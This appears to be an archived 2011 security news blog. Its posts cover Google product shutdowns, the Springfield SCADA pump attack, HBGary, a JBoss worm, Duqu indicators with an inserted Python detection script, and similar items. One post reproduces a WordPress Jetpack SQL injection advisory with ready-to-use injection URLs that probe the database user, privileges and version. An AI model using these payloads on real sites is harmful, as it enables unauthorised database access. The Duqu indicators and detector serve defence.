Wednesday 23 November 2011

Google To Shut Down Seven More Products


The out-of-season "spring clean" brings an end to services including Google Wave, Knol and Google Gears. It is the third time Google has announced a cull of several of its products at the same time after they had failed to take off. Experts said the strategy might put users off signing up for new services.
"We're in the process of shutting a number of products which haven't had the impact we'd hoped for, integrating others as features into our broader product efforts, and ending several which have shown us a different path forward," said Urs Holzle, Google's vice president of operations at the official google blog.

The list includes - 
  • Google Wave - An attempt to combine email and instant messaging for real-time collaboration.
  • Google Bookmarks Lists - A service which allowed users to share bookmarks with friends.
  • Google Friend Connect - A service that allowed webmasters to add social features to their sites by embedding a snippet of code.
  • Google Gears - A much-hyped effort to maintain web browser functionality when working offline.
  • Knol - A Wikipedia-style project, which aimed to improve web content.
  • Renewable Energy Cheaper than Coal - A project which aimed to find ways to improve solar power.
  • Google Search Timeline - A graph of historical query results.
For more details, such as when each switch-off will take place, visit the Google Blog.

Tuesday 22 November 2011

Do you download free software from unofficial websites?




I know you are a pro at searching for and downloading pirated software, and I am sure you are aware of the risk behind it. But what about open-source and free software? Do you download it from third-party websites or file-sharing networks? Well, it's time to be aware of the risk.

Popular open-source software downloaded by thousands of internet users every day includes VLC media player, the Google Chrome browser and others. Many people prefer downloading these from unofficial websites because they feel it is more complicated to download from the official website. In the case of Google Chrome, for example, the official page first gives you a small downloader, which then downloads and installs the browser on your PC, whereas many other websites offer a direct link to the full Chrome .exe file, and people prefer that.




We all know that the main objective of open-source software developers is to share the source code with everyone, because they expect other developers to fix bugs or add new features and make it better. But sometimes this gets abused.

Scammers take advantage of the availability of the source code to trick users and make money. They add malware and adware to this software and release it as the original product. Some deceptive sites even re-brand the original open-source project and sell it as a new product.
Trusted Websites: brother-soft | cnet | sourceforge | filehippo

The scammers bind open-source software with various crapware to monetize it with loads of advertisements. The result is a poor product that doesn't work as intended, can't be uninstalled and clearly abuses its users and their privacy. Recently there were reports that some websites were selling the Mozilla Firefox browser, using the Mozilla trademarks to promote other products and services, or using modified versions of the Mozilla trademarks.
How do these scammers work?

#1 They download the source code from open-source projects and add adware or malware to it.
#2 They release their version of the product and disguise it as the original.
#3 They advertise their product on advertising networks like Google AdWords.
#4 They earn money through the malware and adware bundled with their version of the free software.
#5 They buy more advertisements to spread their copy of the free software and earn even more.

These activities are deceptive, harm users and cause consumer confusion. Open-source software is affected and will keep on being affected by this scourge, and there is not much we can do about it. So the next time you download any free open-source software, make sure you are in the right place.


source

Sunday 20 November 2011

OS.js - The JavaScript Operating System

OS.js started out as a tool that can be used to run GUI applications to configure services without installing X and a window manager (including VNC or similar remote management), connecting from anywhere in the world using just a web browser. It includes a window manager and a simple desktop environment (similar to most Linux environments out there). Standards are inspired by GTK and freedesktop.

Applications are developed using Glade Interface Designer (GTK+3 XML) and (optionally) an SQL database XML scheme. A built-in compiler creates JavaScript, CSS, SQL and PHP templates from the projects, including support for events (signals). One can also create static applications from raw HTML, JS and CSS.

A Virtual Filesystem (VFS) is included; it works with local files, block devices, network connections, compressed files etc. Applications use a public API that consists of simple OS operations and calls to the application's server-side script and the core libraries (file system with restrictions, networking, services, configuration files etc.).

OS.js’ code-base is light-weight and small in size.
  • JavaScript < 300kb (minimized, including applications etc.)
  • CSS < 200 kb (minimized, including applications etc.)
  • XML: < 300 kb (including applications etc.)
  • PHP < 200 kb

Features:
  • Follows strict coding standards, fully documented
  • Uses HTML5 and CSS2+ features (Supported features are detected on first run.)
  • Uses a light-weight PHP backend
  • Simple process management (process stack, kill processes etc)
  • Desktop environment (Customizable settings, themes, fonts, cursors etc)
  • Window Management (With standard window actions like maximize, minimize, restore, on-top and so on)
  • Session Management (Save and restore sessions for later use)
  • Desktop Panels (movable)
  • Desktop Panel items (See list below)
  • Sandboxed Applications with API access and crash-handling
  • Uses WebStorage to store system/user/application settings and sessions (SQL as backup in case of deletion of browser cache)
  • TCP/IP Socket connections via WebSocket wrapper (hybi-00 and hybi-10)
  • Application Compiler (Compiles Application+Glade-XML into JavaScript, CSS and PHP code, also minifies the code)
  • VFS – Virtual Filesystem support (Block devices, Network connections, Compressed files etc.)
  • Application WebWorkers for faster processing of complex data

Compatibility:
  • Working: Linux with WebKit/Safari/Chrome, Gecko/Mozilla/Firefox (Safari has some minor CSS issues)
  • Working: Google Android 2.2 (Samsung Galaxy S tested, 2.2/2.3)
  • Working: Apple iOS 4 (iPad iOS 4 tested)
  • Probably working: Windows with WebKit/Safari/Chrome, Gecko/Mozilla/Firefox (Safari has some minor CSS issues)
  • Partially working: Opera 10+ (problem with Glade/GTK CSS)
  • Partially working: Internet Explorer 8 (problem with Glade/GTK CSS, missing WebSocket and Canvas)
  • Not tested: Internet Explorer 9



For More Information Visit The PROJECT PAGE

Saturday 19 November 2011

Hackers Attack City Water Station and Destroy a Pump


Hackers gained remote access into the control system of the city water utility in Springfield, Illinois, and destroyed a pump last week, according to a report released by a state fusion center and obtained by a security expert. The hackers were discovered on Nov. 8 when a water district employee noticed problems in the city's Supervisory Control and Data Acquisition (SCADA) system. The system kept turning on and off, resulting in the burnout of a water pump.
The intruders launched their attack from IP addresses based in Russia and gained access by first hacking into the network of a software vendor that makes the SCADA system used by the utility. The hackers stole usernames and passwords that the vendor maintained for its customers, and then used those credentials to gain remote access to the utility’s network.
“It is unknown, at this time, the number of SCADA usernames and passwords acquired from the software company’s database and if any additional SCADA systems have been attacked as a result of this theft,” the report states, according to Joe Weiss.

WordPress Jetpack Plugin Vulnerable to SQL Injection

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download: http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP

Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com. An SQL injection vulnerability has been found by longrifle0x in this plugin.



File: wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if

Exploitation:
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None'LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][MID((VERSION()),1,6)
Via - 1337day

Thursday 17 November 2011

After Dealing with Anonymous, HBGary Federal's CEO Resigns



The game is over for Aaron Barr. HBGary Federal’s CEO, who was targeted by Anonymous, announced his resignation on Monday during an interview with Kaspersky's news portal, Threatpost. Barr said he would step down to focus on his family and rebuild his reputation.
Aaron Barr has rarely given interviews to the media since the events that led to Anonymous using him, his company HBGary Federal, and its parent firm HBGary, as an object lesson over a story he gave to the Financial Times. So his interview with Threatpost was both expected, given his announcement, and random, considering his silence.
“I need to focus on taking care of my family and rebuilding my reputation," Barr said during his conversation with Threatpost.
"It’s been a challenge to do that and run a company. And, given that I’ve been the focus of much of bad press, I hope that, by leaving, HBGary and HBGary Federal can get away from some of that. I’m confident they’ll be able to weather this storm.”
The storm started when Barr told the Financial Times on February 5, that he had used clues found online to discover the identities of key Anonymous associates.
He said he was able to make these connections by using services such as LinkedIn, Classmates.com and Facebook, as well as IRC itself. The data he collected was to be used for a presentation during B-Sides San Francisco.
The reaction from Anonymous to the story Barr told was swift and brutal. They compromised HBGary and HBGary Federal, leveraging Web vulnerabilities, as well as privilege elevation exploits, to hijack everything from Twitter and LinkedIn accounts to the company email. The hijacked email is what caused Barr the majority of his problems.
While reading the company communications, Anonymous discovered that Barr was shopping his research to various federal agencies, as well as bragging to co-workers that he had infiltrated the loosely associative group.
Given Barr’s claims, Anonymous released the hijacked emails, holding only Greg Hoglund’s emails in reserve. Some time later, Anonymous released those emails as well. To coincide with the final HBGary leak, they developed a website that contains more than 70,000 HBGary emails in a searchable listing, dubbed AnonLeaks.
The leaked communications provided an interesting look into a security company that deals with both the private and the government sectors at the same time. It was from these emails, as well as a tip from Crowdleaks.org, that The Tech Herald was able to break the story of Barr’s role in a plot with two other data intelligence firms to target WikiLeaks and journalist Glenn Greenwald.
Days after that story broke, ThinkProgress reported on another discovery from the leaked HBGary and HBGary Federal email cache.
According to them, Barr and the same data intelligence firms also developed plans for the U.S. Chamber of Commerce, which would allow them to “undermine their political opponents, including ThinkProgress, with a surreptitious sabotage campaign.” To make matters worse, the plans included families and children.

JBoss Attack Proves Microsoft's Zero-Day Findings

JBoss attack proves Microsoft’s Zero-Day findings. Credit: Red Hat.

A worm targeting unpatched or improperly configured JBoss installations adds some proof to Microsoft's research findings released earlier this month, which point to the fact that unknown vulnerabilities aren't as big a threat as they are made out to be.

According to Red Hat, a worm targeting problems addressed over a year ago is spreading online, allowing an attacker to run arbitrary code on compromised systems. The worm was broken down by a freelance security researcher who came across it when his honeypot server was attacked.

“I explored the contents of the malicious payload left, and it contained Perl Scripts to automatically connect the compromised host to an IRC Server and be part of a BOTNET,” wrote the researcher, who uses the name @guerilla7 on Twitter.

"[The Perl Scripts] install and run a remote access tool using DynDNS (Flu.pl), and two Windows batch scripts, one is for exploring JBOSS Services (wstools.bat) and a script to discover all UDP-based members running on a certain mcast address, JGroups, called "JGroups Cluster Discovery Script for Win32" (probe.bat)."

The authentication bypass vulnerabilities in JBoss were patched in April 2010, and they were covered along with other issues by Christian Papathanasiou, during Trustwave’s BlackHat EU talk the same year. It’s worth reading up on the security concerns, if your organization is one of the tens of thousands of enterprises using it in JSP deployments. [BlackHat EU 2010 Slides]

Likewise, guidance on dealing with password configuration protection related issues can be seen here.

“This problem is exacerbated by many organizations deploying systems that they don’t keep up to date. Many businesses outsource Web application development and once the application is deployed, service contracts may lapse or IT staff may not be paying much attention to them. Many organizations treat these deployments as black boxes, and don’t touch them out of fear that they'll break something,” commented Marcus Carey, security researcher at Rapid7.


“There are three exploit modules in Metasploit, an open source security tool, that exploit this vulnerability. There is also a scanner available in Metasploit to allow organizations to scan for it...yet many organizations are not doing so and are seriously dropping the ball. The use of this new malware associated with JBoss is something we have not seen before; however, the actual vulnerability it is exploiting should have been snuffed out years ago. This is far more a business failure than a software security failure at this point.”

As mentioned, the JBoss attack is a textbook example of what Microsoft reported earlier this month. In their annual Security Intelligence Report, Microsoft said that security flaws where patches are available greatly outnumber zero-day attacks.

According to the research, exploits with a patch available for over a year accounted for 3.2% of compromises, compared to 2.4% for patches available for less than a year. Much-talked-about zero-day attacks were responsible for just 0.12% activity.

“The numbers don't lie; organizations are much more likely to be hit with something they didn't patch instead of a zero-day. This latest news story, as well as the Microsoft report both scream the need to get back to the basics in security. This means better training users and system administrators to prioritize known threats,” added Carey.
Additional Red Hat information on JBoss can be viewed here and here.

Sunday 13 November 2011

Android's Facial Recognition Unlock feature Bypassed by Digital Image


A video demonstration created by mobile blog SoyaCincau shows that the Face Unlock feature can be fooled by showing it a mere image of the face used to set up the locking mechanism. The video shows someone unlocking a Galaxy Nexus running Android 4.0, also known as Ice Cream Sandwich, by holding in front of the device a digital photo taken of him that is displayed on another phone.


Per the description of the YouTube video:
While some of you think that it is a trick and I had set the Galaxy Nexus up to recognise the picture, I assure you that the device was set up to recognise my face.... I would love to do this test again but I don't have a Galaxy Nexus, it is VERY hard to come by as it is not launched yet, but I urge anyone with a Galaxy Nexus to do the same test. Program the device to recognise YOUR FACE and then try to trick the same device with a similar looking picture, it will work
A Google representative contacted by CNET said the feature is considered low security and experimental. Even the interface warns users that "Face Unlock is less secure than a pattern, PIN, or password" and that "Someone who looks similar to you could unlock your phone."


"It was safe to assume that Google wouldn't let its face-recognition technology be bypassed using a photo but this confirms it," The Next Web wrote at the time. "Good news for those who were worried about their friends hacking their smartphone by using a Facebook profile photo or something similar." 

Iran Detects and Fights Back Duqu Virus in System


Iran said on Sunday it had detected the Duqu computer virus that experts say is based on Stuxnet, the so-called "cyber-weapon" discovered last year and believed to be aimed at sabotaging the Islamic Republic's nuclear sites.
The head of Iran's civil defense organization told the official IRNA news agency that computers at all main sites at risk were being checked and that Iran had developed anti-virus software to fight back the virus. "We are in the initial phase of fighting the Duqu virus," Gholamreza Jalali was quoted as saying. "The final report which says which organizations the virus has spread to and what its impacts are has not been completed yet."
While Stuxnet was aimed at crippling industrial control systems and may have destroyed some of the centrifuges Iran uses to enrich uranium, experts say Duqu appeared designed to gather data to make it easier to launch future cyber attacks. "Duqu is essentially the precursor to a future Stuxnet-like attack," Symantec said in a report last month, adding that instead of being designed to sabotage an industrial control system, the new virus could gain remote access capabilities.
Iran also said in April that it had been targeted by a second computer virus, which it called "Stars". It was not clear if Stars and Duqu were related but Jalali had described Duqu as the third virus to hit Iran.
Iran has developed a software program that can "control" the newly discovered Duqu spyware, the director of Iran's Passive Defense Organization has announced. "The software, capable of controlling this virus (Duqu), has been provided to organizations and institutions," IRNA quoted Brigadier General Gholamreza Jalali as saying on Sunday. In July, media reports claimed that Stuxnet had targeted industrial computers around the globe, with Iran being the main target of the attack. The reports said Iran's newly launched Bushehr nuclear power plant was at the center of the cyber attack. However, Iranian experts detected the worm in time, averting any damage to the country's industrial sites and resources.

"The (Iranian) cyber defense base is working round the clock to adopt the necessary measures to counter cyber attacks and the infiltration of spyware," Jalali stated.

Friday 11 November 2011

Exploring the Duqu Bot


The Duqu trojan is composed of several malicious files that work together for a malicious purpose. The first component is a Windows kernel driver that searches for and loads encrypted dynamic link library (DLL) files. The decrypted DLL files implement the main payload of Duqu, which is a remote access trojan (RAT). The RAT allows an adversary to gather information from a compromised computer and to download and run additional programs.

Duqu vs Stuxnet

Attribute | Duqu | Stuxnet
Infection Methods | Unknown | USB (Universal Serial Bus); PDF (Portable Document Format)
Dropper Characteristics | Installs signed kernel drivers to decrypt and load DLL files | Installs signed kernel drivers to decrypt and load DLL files
Zero-days Used | None yet identified | Four
Command and Control | HTTP, HTTPS, Custom | HTTP
Self Propagation | None yet identified | P2P (Peer to Peer) using RPCs (Remote Procedure Call); Network Shares; WinCC Databases (Siemens)
Data Exfiltration | Add-on, keystroke logger for user and system info stealing | Built-in, used for versioning and updates of the malware
Date triggers to infect or exit | Uninstalls self after 36 days | Hard coded, must be in the following range: 19790509 => 20120624
Interaction with Control Systems | None | Highly sophisticated interaction with Siemens SCADA control systems


Like Stuxnet, Duqu attacks Windows systems using a zero-day vulnerability. The installer file is a Microsoft Word (.doc) document that exploits the Win32k TrueType font parsing engine and allows code execution. Duqu targets one of the problems in T2EMBED.DLL, which is a TrueType font parsing engine.

How Does Duqu Spread?

Duqu doesn't spread on its own. In one known case, Duqu was installed by a document attachment which was delivered via an e-mail message.

What are indicators of a Duqu infection?

Duqu contains a backdoor that steals information. Infostealers need to send the stolen information back somehow, and careful ones try to make the transfer look innocent in case somebody is watching the network traffic. Duqu hides its traffic by making it look like normal web traffic. Administrators should monitor their network for systems attempting to resolve the domain below or connect to the C2 IP address, as a sign of possible infection.
Duqu connects to a server (206.183.111.97, a.k.a. canoyragomez.rapidns.com, which used to be in India) and sends an HTTP request. The server responds with a blank JPG image, after which Duqu sends back a 56 kB JPG file called dsc00001.jpg with the stolen information (encrypted with AES) appended to the end of the image file. Read more about the JPEG here.


Name | File Size | MD5
jminet7.sys | 24,960 bytes | 0eecd17c6c215b358b7b872b74bfd80
netp191.pnf | 232,448 bytes | b4ac366e24204d821376653279cbad8
netp192.pnf | 6,750 bytes | 94c4ef91dfcd0c53a96fdc387f9f9c3
cmi4432.sys | 29,568 bytes | 4541e850a228eb69fd0f0e924624b24
cmi4432.pnf | 192,512 bytes | 0a566b1616c8afeef214372b1a0580c
cmi4464.pnf | 6,750 bytes | e8d6b4dadb96ddb58775e6c85b10b6c
<unknown> (sometimes referred to as keylogger.exe) | 85,504 bytes | 9749d38ae9b9ddd81b50aad679ee87e
nfred965.sy | 24,960 bytes | c9a31ea148232b201fe7cb7db5c75f5
nred961.sys | unknown | f60968908f03372d586e71d87fe795c
adpu321.sy | 24,960 bytes | 3d83b077d32c422d6c7016b5083b9fc
iaStor451.sys | 24,960 bytes | bdb562994724a35a1ec5b9e85b8e054f

(The byproducts in the Table  have been collected from multiple Duqu variants and would not be present on a single infected computer.)

Why Duqu?

The name “Duqu” was assigned to this malware because the keylogger program creates temporary files that begin with the prefix “~DQ”. A computer infected with Duqu may have files beginning with “~DQ” in Windows temporary directories.
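As an added example (not code from the original post), the checks below turn this post's indicators into working Python: matching the C2 domain and IP from the infection-indicators section above against sample DNS/proxy log lines, detecting data appended after a JPEG's End-Of-Image marker (the dsc00001.jpg exfiltration trick), and flagging temp-file names with the ~DQ prefix described here. The log lines, file names and JPEG bytes are constructed samples.

```python
"""Duqu indicator checks: a constructed example, not code from the original post.
Covers log lines that reference the C2 domain/IP, a JPEG with data appended after
its End-Of-Image marker (the dsc00001.jpg trick) and "~DQ" temp-file names.
"""
import re
from typing import Iterable, List

C2_DOMAIN = "canoyragomez.rapidns.com"   # indicators quoted in the post
C2_IP = "206.183.111.97"
TEMP_PREFIX = "~DQ"
C2_PATTERN = re.compile(re.escape(C2_DOMAIN) + "|" + re.escape(C2_IP), re.IGNORECASE)
JPEG_SOI, JPEG_EOI = b"\xff\xd8", b"\xff\xd9"


def find_c2_hits(log_lines: Iterable[str]) -> List[str]:
    """Return the DNS/proxy log lines that mention the C2 domain or IP."""
    return [line for line in log_lines if C2_PATTERN.search(line)]


def jpeg_trailing_bytes(data: bytes) -> int:
    """Count bytes after the top-level JPEG End-Of-Image marker, or -1 if the data
    is not a JPEG or has no top-level EOI (e.g. truncated). Walks marker segments
    rather than searching for the first FF D9, since an EXIF thumbnail has its own.
    """
    if not data.startswith(JPEG_SOI):
        return -1
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            return -1                      # expected a marker here
        marker = data[pos + 1]
        if marker == 0xFF:                 # fill byte before a marker
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:                 # EOI: everything after it is extra
            return len(data) - pos
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:
            continue                       # standalone markers carry no length
        if pos + 2 > len(data):
            return -1
        seg_len = int.from_bytes(data[pos:pos + 2], "big")
        if seg_len < 2:
            return -1
        pos += seg_len
        if marker == 0xDA:                 # SOS: entropy-coded data follows
            while pos + 1 < len(data):     # FF00 is stuffing, FFD0-D7 are restarts
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return -1


def duqu_temp_names(file_names: Iterable[str]) -> List[str]:
    """File names (e.g. a listing of %TEMP%) that carry the ~DQ prefix."""
    return [n for n in file_names if n.upper().startswith(TEMP_PREFIX)]


def build_sample_jpeg(payload: bytes = b"") -> bytes:
    """Construct a tiny JPEG-shaped byte string with `payload` appended after EOI;
    the APP1 body holds a thumbnail-like SOI/EOI pair and the scan holds FF00
    stuffing and an RST marker, so a naive first-FFD9 search would be wrong.
    """
    app1_body = b"Exif\x00\x00" + JPEG_SOI + JPEG_EOI
    app1 = b"\xff\xe1" + (len(app1_body) + 2).to_bytes(2, "big") + app1_body
    sos_body = b"\x01\x01\x00\x00\x3f\x00"
    sos = b"\xff\xda" + (len(sos_body) + 2).to_bytes(2, "big") + sos_body
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    return JPEG_SOI + app1 + sos + scan + JPEG_EOI + payload


SAMPLE_LOG = [  # constructed, not real logs
    "2011-11-11 09:12:07 dns 10.0.0.23 query canoyragomez.rapidns.com A",
    "2011-11-11 09:13:44 proxy 10.0.0.23 -> 206.183.111.97:80 GET / 200 image/jpeg",
    "2011-11-11 09:14:02 proxy 10.0.0.15 -> 192.0.2.10:443 CONNECT 200",
]
SAMPLE_TEMP = ["~DF3C21.tmp", "~DQ1A2B.tmp", "dsc00001.jpg"]  # constructed names
```

Run `jpeg_trailing_bytes` over the image bytes a suspect host uploaded; a non-zero result on a file that still opens as a picture is the appended-payload pattern the post describes.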

Duqu Malware Detection Tool


The Free Duqu Detector Toolkit comes from the CrySyS Lab at the Budapest University of Technology and Economics, which was the first group to discover Duqu, as well as to discover a dropper file (installer) for Duqu that offered additional clues into how the malware would have infected computers and spread. Notably, the installer recovered by CrySyS was a malicious Word document (.doc) file, although security researchers said the malware may have been spread through other means as well.
CrySyS said its toolkit, which includes four command-line-executable components, intentionally includes "very simple, easy-to-analyze program source code, to check that there is no backdoor or malicious code inside." That way, potential users can easily validate the source code before using it in highly specialized environments.
To date, Microsoft has detailed a workaround for the zero-day vulnerability that researchers unearthed in the Duqu source code, which involves a font parsing flaw in the TrueType engine in 32-bit versions of Windows. That vulnerability would have helped the malware to spread and infect its target without being detected. But Microsoft has yet to issue a patch that fixes the flaw exploited by Duqu.


Tuesday 8 November 2011

TeaMp0isoN Hacks International Foreign Government E-Mails

Team Poison strikes again
Hex000101, a member of the TeaMp0isoN team, has hacked and leaked the login credentials of various government sites, such as armynet.mod.uk and aph.gov.au, after hacking their databases. They have released these logins in a Pastebin post. The post doesn't contain any details or explanation of why the operation took place, but most likely the credentials were leaked as a form of retaliation against state institutions.



Thursday 3 November 2011

Android Reverse Engineering ( A.R.E ) Virtual Machine


The Android Reverse Engineering (A.R.E.) Virtual Machine, put together by Anthony Desnos from our French chapter, is here to help. A.R.E. combines the latest Android malware analysis tools in a readily accessible toolbox.


Tools - 
  • http://www.honeynet.org/downloads/Android.tar.gz
  • http://itsec.rwth-aachen.de/files/honeynetproject_are.tar.gz
  • http://www.honeynor.no/data/honeynetproject_are.tar.gz

The login is : android
And the password is : android